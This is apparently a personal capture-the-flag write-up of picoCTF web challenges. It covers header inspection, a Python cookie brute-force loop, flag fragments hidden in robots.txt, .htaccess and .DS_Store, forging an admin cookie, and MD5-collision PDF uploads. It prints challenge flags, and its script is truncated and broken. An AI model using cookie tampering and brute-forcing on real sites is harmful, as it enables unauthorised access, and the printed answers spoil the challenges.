Some challenges from the picoGym

Written by: Jan Fok

picoCTF logo

Get aHead

Category: Web Exploitation

From the title of the challenge, I get a hint to check the headers of the website.

I used the following command to obtain the header which returned the flag:

$ curl -I <url>




Category: Web Exploitation

When I open the webpage on my browser, I see a search box with the words “snickerdoodle” in transparent. Using Burp Suite to intercept the response request after entering the phrase, I see that the set-cookie has a value of 0. Manually changing the set-cookie to other integer values returns a different response. Using the following python script, I brute-forced the cookie values and obtained the flag at “name=18”.


import requests
url = 'http://mercury.picoctf.net:6418/'

for i in range(20):
    text = str(i)
    cookie = {
        'name': text

    response = requests.get(url, cookies=cookie)
    result = response.text.split(
            '<p style=\"text-align:center; font-size:30px;\"><b>')[1].split('</b>')[0]
    if not ('I love' in result):



Scavenger Hunt

Category: Web Exploitation

Looking at the source code, I find the first part of the flag: picoCTF{t.

The second part of the flag can be found in the css code: h4ts_4_l0.

In the javascript file, there is a comment which asks us “How can I keep Google from indexing my website?“. After a quick google search, I found that a file labelled robots.txt is added in the root directory of websites with instructions for web crawlers.

Appending the filename to the url, I find the next part of the flag: t_0f_pl4.

I then get a clue to look in the apache access file, which a quick google search tells us that it’s called the .ht_access file. Appending that to the url gives us the 4th part of the flag: 3s_2_lO0k.

The next clue tells us to look for a file which stores information on a mac. Google then informs us that it’s called a .DS_Store file. Looking in that file, I get the final part of the flag: _a69684fd}.




Category: Web Exploitation

The task’s description asks us to log in as Joe.

The website allows anonymous log in with no password, but I won’t get a flag.

Using Burp to intercept the response packet, I can see that there is a cookie labelled ‘admin’. Changing the value to ‘True’ brings us to the page with the flag.




Category: Web Exploitation

Looking at the source code, I se a javascript file which contains a function which splits the flag into 8 pieces. Piecing them together gives us the flag.



It is my Birthday

Category: Web Exploitation, Encryption

I are provided a URL to a webpage which contains two forms requesting for two PDFs.

First, I tested if code injection worked, but I got no response from injecting bash code.

Eventually, I found a StackOverflow post online which talked about md5 hashing collisions.

Searching on google, I found two collision values for md5. Copying the values into two separate PDF files and uploading to the website, I managed to obtain the flag.